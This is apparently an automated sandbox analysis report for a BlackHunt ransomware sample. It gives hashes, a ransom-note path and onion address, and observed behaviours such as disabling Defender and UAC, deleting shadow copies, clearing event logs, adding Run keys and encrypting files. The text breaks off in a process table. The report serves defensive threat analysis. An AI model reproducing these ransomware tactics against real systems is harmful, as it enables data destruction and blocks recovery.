Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:10
Static task
static1
Behavioral task
behavioral1
Sample
2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe
Resource
win10v2004-20231222-en
General
-
Target
2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe
-
Size
707KB
-
MD5
757a3aba290567376fa0b21fc14656e0
-
SHA1
f511eceb9f89291dead1bc39f3de9182edfbef99
-
SHA256
2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be
-
SHA512
6f59a10a37aea79537cc79e919b33b4afc17f0eef90a8cdd819ee19e55c95f75c03f388eecb6477085607e485eaff46c2c66475eb7cd5627335acb533e149bf9
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1C85vnh:6uaTmkZJ+naie5OTamgEoKxLW59h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 9872 fsutil.exe 8696 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7244 wevtutil.exe 8672 wevtutil.exe 8384 wevtutil.exe 9972 wevtutil.exe 10048 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8860 bcdedit.exe 9084 bcdedit.exe 13828 bcdedit.exe 14820 bcdedit.exe -
Renames multiple (3362) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 9916 wbadmin.exe 5156 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Z: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\V: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\B: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\P: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\G: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\L: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\X: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\I: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\S: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\K: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\N: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\Y: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\H: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\M: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\R: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\U: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\O: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\A: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\J: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened (read-only) \??\Q: 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ui-strings.js 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\glib.md 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\vi_get.svg 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\PlayStore_icon.svg 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\he-il\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\unicode.md 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ar-ae\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File opened for modification C:\Program Files\Java\jre-1.8\README.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files\VideoLAN\VLC\locale\he\#BlackHunt_ReadMe.txt 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#BlackHunt_ReadMe.hta 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\#BlackHunt_Private.key 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5920 4544 WerFault.exe 297 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2816 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3184 vssadmin.exe 7704 vssadmin.exe 2640 vssadmin.exe 1784 vssadmin.exe 1656 vssadmin.exe 4844 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5352 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 12828 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Token: SeRestorePrivilege 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Token: SeBackupPrivilege 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Token: SeTakeOwnershipPrivilege 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Token: SeAuditPrivilege 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Token: SeSecurityPrivilege 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Token: SeIncBasePriorityPrivilege 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Token: SeBackupPrivilege 1112 vssvc.exe Token: SeRestorePrivilege 1112 vssvc.exe Token: SeAuditPrivilege 1112 vssvc.exe Token: SeBackupPrivilege 9496 wbengine.exe Token: SeRestorePrivilege 9496 wbengine.exe Token: SeSecurityPrivilege 9496 wbengine.exe Token: SeSecurityPrivilege 7244 wevtutil.exe Token: SeBackupPrivilege 7244 wevtutil.exe Token: SeSecurityPrivilege 8672 wevtutil.exe Token: SeBackupPrivilege 8672 wevtutil.exe Token: SeSecurityPrivilege 8384 wevtutil.exe Token: SeBackupPrivilege 8384 wevtutil.exe Token: SeSecurityPrivilege 9972 wevtutil.exe Token: SeBackupPrivilege 9972 wevtutil.exe Token: SeSecurityPrivilege 10048 wevtutil.exe Token: SeBackupPrivilege 10048 wevtutil.exe Token: SeDebugPrivilege 5352 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1804 wrote to memory of 4008 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 207 PID 1804 wrote to memory of 4008 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 207 PID 1804 wrote to memory of 3272 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 205 PID 1804 wrote to memory of 3272 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 205 PID 1804 wrote to memory of 2436 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 204 PID 1804 wrote to memory of 2436 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 204 PID 1804 wrote to memory of 2876 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 202 PID 1804 wrote to memory of 2876 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 202 PID 4008 wrote to memory of 4544 4008 cmd.exe 92 PID 4008 wrote to memory of 4544 4008 cmd.exe 92 PID 1804 wrote to memory of 2512 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 93 PID 1804 wrote to memory of 2512 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 93 PID 3272 wrote to memory of 2196 3272 cmd.exe 95 PID 3272 wrote to memory of 2196 3272 cmd.exe 95 PID 2436 wrote to memory of 2948 2436 cmd.exe 97 PID 2436 wrote to memory of 2948 2436 cmd.exe 97 PID 2876 wrote to memory of 1932 2876 cmd.exe 96 PID 2876 wrote to memory of 1932 2876 cmd.exe 96 PID 1804 wrote to memory of 2996 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 200 PID 1804 wrote to memory of 2996 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 200 PID 1804 wrote to memory of 3192 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 99 PID 1804 wrote to memory of 3192 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 99 PID 1804 wrote to memory of 3380 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 141 PID 1804 wrote to memory of 3380 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 141 PID 1804 wrote to memory of 4800 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 198 PID 1804 wrote to memory of 4800 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 198 PID 2512 wrote to memory of 4468 2512 cmd.exe 103 PID 2512 wrote to memory of 4468 2512 cmd.exe 103 PID 1804 wrote to memory of 1468 1804 